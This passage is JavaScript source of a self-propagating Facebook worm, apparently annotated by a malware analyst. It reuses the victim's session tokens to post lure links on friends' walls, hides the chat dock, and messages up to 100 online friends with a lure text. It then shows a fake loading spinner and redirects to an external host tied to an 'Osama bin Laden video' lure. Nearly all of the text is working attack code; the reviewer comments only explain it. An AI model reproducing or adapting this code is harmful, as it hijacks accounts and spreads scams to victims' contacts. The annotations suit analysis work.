				var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
				
				httpwp.open("POST", urlwp, true);
				
				//Send the proper header information along with the request
				//(Content-length/Connection are browser-managed; setting them by hand is ignored or refused.)
				
				httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpwp.setRequestHeader("Content-length", paramswp.length);
				httpwp.setRequestHeader("Connection", "keep-alive");
				
				// Empty handler: the result of each wall post is never inspected.
				httpwp.onreadystatechange = function() { //Call a function when the state changes.
					if(httpwp.readyState == 4 && httpwp.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}

				}

				httpwp.send(paramswp);
	
			}

			count++; // increment counter
		
		}
				
		// NOTE(review): this is a property read, not a call, and XHR has no
		// close() — it is a no-op.
		http1.close; // Close the connection
		
		
		
	}
	
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Hides the chat dock so the victim does not see the chat messages being
// sent below. Throws (and stops the script) if the element is absent.
var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

// Chat propagation: fetch the buddy list, then send the lure text
// (prepared_chat) to up to 100 currently-online friends, one XHR each.
var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
//(Content-length/Connection are browser-managed; setting them by hand is ignored or refused.)
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
	if(http3.readyState == 4 && http3.status == 200) {
		
		var response3 = http3.responseText;
		
		response3 = response3.replace("for (;;);", ""); // strip the anti-JSON-hijacking prefix
		response3 = JSON.parse(response3);
		
		var count = 0;
		
		// `property` (implicit global) is the key of nowAvailableList — used
		// below as the recipient id — so here the for-in is the real iterator.
		for(property in response3.payload.buddy_list.nowAvailableList){
			
			if(count < 100){
				
				// Loop to send messages
			
				// New XMLHttp object
				var httpc = new XMLHttpRequest();
				
				// Generate random message ID
								
				var msgid = Math.floor(Math.random()*1000000);
				
				var time = Math.round(new Date().getTime() / 1000); // Unix seconds, reused for client_time and pvs_time
				
				var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
				var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
				httpc.open("POST", urlc, true);
				
				//Send the proper header information along with the request
				httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
				httpc.setRequestHeader("Content-length", paramsc.length);
				httpc.setRequestHeader("Connection", "close");
				
				// Empty handler: the result of each chat send is never inspected.
				httpc.onreadystatechange = function() { //Call a function when the state changes.
					if(httpc.readyState == 4 && httpc.status == 200){
						//alert(http.responseText);
						//alert('buddy list fetched');
					}
				}
				httpc.send(paramsc);
	
			}
			
			//alert(property);
			count++; // increment counter
		
		}
		
		// NOTE(review): property read, not a call — a no-op (XHR has no close()).
		http3.close; // Close the connection
		
	}
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
	if(http4.readyState == 4 && http4.status == 200) {
			
		http4.close; // Close the connection
		
	}
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
	if(http5.readyState == 4 && http5.status == 200) {
			
		http5.close; // Close the connection
		
	}
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none";
// Cover story: replace the page's main content with a "Please wait" spinner
// (image hot-linked from a third-party news site) while the requests above
// run, then after 15 s redirect the whole window to an external page (the
// final landing host — an IoC for this sample). The string form of
// setTimeout is evaluated as code; a function would do the same job.
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
setTimeout("window.location = 'http://osama.mytopanswers.info/video.htm';", 15000);
facebook, osama bin laden